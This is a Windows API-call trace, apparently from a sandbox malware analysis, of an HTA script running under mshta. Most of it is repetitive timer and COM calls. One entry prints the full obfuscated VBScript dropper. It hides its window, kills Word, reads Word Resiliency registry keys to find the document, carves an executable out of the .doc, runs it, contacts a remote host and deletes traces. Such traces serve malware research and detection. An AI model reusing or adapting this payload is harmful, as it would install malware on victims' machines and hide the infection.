[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.060] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.061] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.062] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.064] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] GetTickCount () returned 0x2006d
[0067.065] SetTimer (hWnd=0x10206, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0067.066] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0067.066] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x39afb0) returned 0x800c0011
[0067.066] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.066] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.066] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.066] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x2106, pPolicy=0x2aed10, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2aed10*=0x0) returned 0x0
[0067.066] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.066] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2aef80 | out: ppu=0x2aef80) returned 0x0
[0067.066] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0067.066] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x39afb0) returned 0x800c0011
[0067.066] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.066] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.066] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.066] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x2aef80, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2aef80*=0x0) returned 0x0
[0067.067] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.067] GetTickCount () returned 0x2006d
[0067.067] Sleep (dwMilliseconds=0x0)
[0067.071] GetTickCount () returned 0x2007c
[0067.071] GetTickCount () returned 0x2007c
[0067.071] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2aeeb0 | out: ppu=0x2aeeb0) returned 0x0
[0067.071] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0067.071] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x39afb0) returned 0x800c0011
[0067.071] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.071] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.071] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.071] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x2aeeb0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2aeeb0*=0x0) returned 0x0
[0067.072] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.072] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2aedf0 | out: ppu=0x2aedf0) returned 0x0
[0067.072] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0067.072] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x39afb0) returned 0x800c0011
[0067.072] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.072] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.072] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.072] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x2aedf0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2aedf0*=0x0) returned 0x0
[0067.072] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.072] FaultInIEFeature (in: hWnd=0x10206, pClassSpec=0x2aede0, pQuery=0x0, dwFlags=0x0 | out: pQuery=0x0) returned 0x1
[0067.072] CoCreateInstance (in: rclsid=0x2aedd0*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee0f847a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x2aedb0 | out: ppv=0x2aedb0*=0x5db4d0) returned 0x0
[0067.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2acf90 | out: lpSystemTimeAsFileTime=0x2acf90*(dwLowDateTime=0xd7f966d0, dwHighDateTime=0x1d34cee))
[0067.153] GetCurrentProcessId () returned 0xbc0
[0067.153] GetCurrentThreadId () returned 0xbc4
[0067.153] GetTickCount () returned 0x200ab
[0067.153] QueryPerformanceCounter (in: lpPerformanceCount=0x2acf98 | out: lpPerformanceCount=0x2acf98*=493617723) returned 1
[0067.162] __dllonexit () returned 0x7fee043bfc0
[0067.162] __dllonexit () returned 0x7fee043bfa8
[0067.162] __dllonexit () returned 0x7fee043bfd4
[0067.171] GetUserDefaultLCID () returned 0x409
[0067.171] GetVersion () returned 0x1db10106
[0067.175] GetUserDefaultLCID () returned 0x409
[0067.175] GetACP () returned 0x4e4
[0067.175] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0067.176] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x39afb0) returned 0x800c0011
[0067.176] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.176] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.176] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.176] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1401, pPolicy=0x2aec80, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2aec80*=0x0) returned 0x0
[0067.176] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.176] GetCurrentThreadId () returned 0xbc4
[0067.176] GetCurrentThreadId () returned 0xbc4
[0067.177] GetCurrentThreadId () returned 0xbc4
[0067.177] GetCurrentThreadId () returned 0xbc4
[0067.177] GetCurrentThreadId () returned 0xbc4
[0067.177] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0067.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2aeb60, cchData=6 | out: lpLCData="1252") returned 5
[0067.177] IsValidCodePage (CodePage=0x4e4) returned 1
[0067.177] GetCurrentThreadId () returned 0xbc4
[0067.177] GetCurrentThreadId () returned 0xbc4
[0067.177] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe1c0000
[0067.178] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CoCreateInstance") returned 0x7fefe1e7490
[0067.178] CoCreateInstance (in: rclsid=0x7fee048d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee048d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x5db818 | out: ppv=0x5db818*=0x4003b0) returned 0x0
[0067.178] IUnknown:AddRef (This=0x4003b0) returned 0x2
[0067.178] GetCurrentProcessId () returned 0xbc0
[0067.178] GetCurrentThreadId () returned 0xbc4
[0067.178] GetTickCount () returned 0x200ca
[0067.178] ISystemDebugEventFire:BeginSession (This=0x4003b0, guidSourceID=0x7fee048d5d8, strSessionName="VBScript:00003008:00003012:18131274") returned 0x0
[0067.178] GetCurrentThreadId () returned 0xbc4
[0067.178] GetCurrentThreadId () returned 0xbc4
[0067.178] GetCurrentThreadId () returned 0xbc4
[0067.178] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0067.179] GetCurrentThreadId () returned 0xbc4
[0067.179] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x2) returned 0x7fefde73480
[0067.179] StrCmpIW (psz1="http://www.samyrai777m.p-host.in/t/t.php?thread=0", psz2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0
[0067.179] GetCurrentThreadId () returned 0xbc4
[0067.180] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.180] _wcsicmp (_String1="", _String2="") returned 0
[0067.180] SysStringLen (param_1="\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -2000,-2000\r\nDim o,kw,cr1,cr2,ps,d,l,r,wv\r\nSet\x09o\x09=\x09CReAtEOBJECt\x09(\x09StrReverse(ChrW(&H57)) & StrReverse(ChrW(&H73)) & StrReverse(Chr(&H43)) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H50)) & StrReverse(Chr(&H74)) & Chr(&H2E) & ChrW(&H53) & StrReverse(Chr(&H48)) & StrReverse(Chr(&H65)) & StrReverse(Chr(&H4C)) & StrReverse(Chr(&H6C))\x09)\r\nwd=o.expAnDenvIRonMEnTStrings(\x09StrReverse(Chr(&H25)) & StrReverse(Chr(&H73)) & StrReverse(ChrW(&H59)) & ChrW(&H53) & StrReverse(Chr(&H74)) & ChrW(&H65) & StrReverse(ChrW(&H6D)) & Chr(&H52) & StrReverse(Chr(&H4F)) & StrReverse(Chr(&H4F)) & StrReverse(Chr(&H74)) & Chr(&H25)\x09)\r\nps= wd & Chr(&H5C) & StrReverse(ChrW(&H53)) & StrReverse(ChrW(&H59)) & ChrW(&H53) & Chr(&H74) & ChrW(&H65) & Chr(&H4D) & StrReverse(ChrW(&H33)) & StrReverse(ChrW(&H32)) & Chr(&H5C) & StrReverse(Chr(&H77)) & ChrW(&H69) & StrReverse(Chr(&H6E)) & ChrW(&H64) & StrReverse(Chr(&H6F)) & Chr(&H77) & Chr(&H73) & StrReverse(ChrW(&H70)) & StrReverse(ChrW(&H4F)) & StrReverse(Chr(&H77)) & Chr(&H65) & StrReverse(Chr(&H52)) & Chr(&H53) & Chr(&H48) & StrReverse(Chr(&H65)) & StrReverse(ChrW(&H4C)) & ChrW(&H4C) & StrReverse(ChrW(&H5C)) & StrReverse(Chr(&H56)) & StrReverse(Chr(&H31)) & ChrW(&H2E) & Chr(&H30) & ChrW(&H5C) & Chr(&H50) & Chr(&H6F) & ChrW(&H57) & Chr(&H45) & ChrW(&H72) & ChrW(&H53) & Chr(&H48) & ChrW(&H45) & Chr(&H4C) & StrReverse(ChrW(&H4C)) & StrReverse(ChrW(&H2E)) & StrReverse(Chr(&H45)) & StrReverse(Chr(&H78)) & Chr(&H65) & \" -WindowStyle Hidden \"\r\nkw = \"taskkill /f /im winword.exe;\"\r\nd=Chr(36)\r\nl=Chr(91)\r\nr=Chr(93)\r\ncr1=\"ri -Path \"\"\"\"\"\"HKCU:\\Software\\Microsoft\\Office\\\"\r\ncr2=\"\\Word\\Resiliency\"\"\"\"\"\" -recurse;\"\r\no.run ps & \"Try{\" & d & \"ada=\"\"\"\"\"\"\" & d & \"env:APPDATA\\result.exe\"\"\"\"\"\";\" & d & \"adax=\" & d & \"ada+'x';\" & d & \"f=\" & l & \"System.IO.File\" & r & \"::Create(\" &d & \"adax);\" & d & \"tmf=\"\"\"\"\"\"\" & d & \"env:TEMP\\o.tmp\"\"\"\"\"\";\" & kw & \"Function pr{Try{\" & d & \"k=\"\"\"\"\"\"HKCU:\\Software\\Microsoft\\Office\\\" &d & \"wv\" & \"\\Word\\Resiliency\\StartupItems\\\"\"\"\"\"\";\" & \"for (\" & d & \"i = 0; \" & d & \"i -lt 10; \" & d & \"i++){\" & d & \"r=\" & l & \"System.Text.Encoding\" & r & \"::Unicode.GetString((gp \" & d & \"k).((gi \" & d & \"k).Property\" & l & d & \"i\" & r & \"));if (\" & d & \"r.Contains('.doc')){\" & d & \"i=10;}}\"\x09& d & \"r=\" & d & \"r.Substring(\" & d & \"r.indexOf(':\\')-1);\" & d & \"r=\" & d & \"r.Substring(0, \" & d & \"r.IndexOf('.doc')+4);\" & cr1 & d & \"wv\" & cr2 & \"cp -Path \"& d &\"r -Destination \" & d & \"tmf\" & \";\" & d & \"d = (gc \" & d & \"tmf\" & \" -ReadCount 0 -encoding byte)\" & l & \"985480..1011591\" & r & \";Start-Sleep -s 1;sc \" & d & \"r -encoding byte -Value \" & d & \"d;\" & \"start winword \"\"\"\"\"\"\" & d & \"r\"\"\"\"\"\";\" & d & \"f = (gc \" & d & \"tmf\" & \" -ReadCount 0 -encoding byte)\" & l & \"420737..985472\" & r & \";sc \" & d & \"ada\" & \" -encoding byte -Value \" & d & \"f;\" & \"& \" & d & \"ada;\" & d & \"wc = New-Object system.Net.WebClient;\" & d & \"ht=\" & d & \"wc.d\" & \"ownl\" & \"oadS\" & \"tri\" & \"ng('http://www.samyrai777m.p-host.in/t/t.php?act=hit');\" & d & \"cd=(Resolve-Path .\\).Path;ri \"\"\"\"\"\"\" & d & \"cd\\*\"\"\"\"\"\" -include http*.pdb, http*.dll, *.cs;\" & \"}Catch{}};\" & d & \"wv='12.0';pr;\" & d & \"wv='14.0';pr;\" & d & \"wv='15.0';pr;\" & d & \"wv='16.0';pr;\" & \"Stop-Process -processname powershell;}Catch{exit;}\",0,true\r\nself.close\r\n") returned 0xccc
[0067.185] ISystemDebugEventFire:IsActive (This=0x4003b0) returned 0x1
[0067.185] GetCurrentThreadId () returned 0xbc4
[0067.185] GetCurrentThreadId () returned 0xbc4
[0067.185] GetCurrentThreadId () returned 0xbc4
[0067.186] GetCurrentThreadId () returned 0xbc4
[0067.186] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.186] GetCurrentThreadId () returned 0xbc4
[0067.186] GetCurrentThreadId () returned 0xbc4
[0067.186] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.220] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] IsCharSpaceW (wch=0x6f) returned 0
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] IsCharSpaceW (wch=0x6f) returned 0
[0067.225] GetCurrentThreadId () returned 0xbc4
[0067.225] GetCurrentThreadId () returned 0xbc4
[0067.225] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.225] GetCurrentThreadId () returned 0xbc4
[0067.225] GetCurrentThreadId () returned 0xbc4
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] IsCharSpaceW (wch=0x6b) returned 0
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.225] IsCharSpaceW (wch=0x6b) returned 0
[0067.225] GetCurrentThreadId () returned 0xbc4
[0067.225] GetCurrentThreadId () returned 0xbc4
[0067.225] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] IsCharSpaceW (wch=0x63) returned 0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] IsCharSpaceW (wch=0x63) returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] IsCharSpaceW (wch=0x63) returned 0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] IsCharSpaceW (wch=0x63) returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] IsCharSpaceW (wch=0x70) returned 0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] IsCharSpaceW (wch=0x70) returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] GetCurrentThreadId () returned 0xbc4
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.226] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x64) returned 0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x64) returned 0
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x6c) returned 0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x6c) returned 0
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x72) returned 0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x72) returned 0
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] GetCurrentThreadId () returned 0xbc4
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x77) returned 0
[0067.227] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.227] IsCharSpaceW (wch=0x77) returned 0
[0067.228] GetCurrentThreadId () returned 0xbc4
[0067.228] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.228] GetCurrentThreadId () returned 0xbc4
[0067.228] GetCurrentThreadId () returned 0xbc4
[0067.228] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.228] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.228] GetCurrentThreadId () returned 0xbc4
[0067.228] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.297] GetCurrentThreadId () returned 0xbc4
[0067.298] GetCurrentThreadId () returned 0xbc4
[0067.298] IsWindow (hWnd=0x101fa) returned 1
[0067.298] IsWindowVisible (hWnd=0x101fa) returned 0
[0067.298] GetCurrentThreadId () returned 0xbc4
[0067.298] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.298] GetCurrentThreadId () returned 0xbc4
[0067.298] GetCurrentThreadId () returned 0xbc4
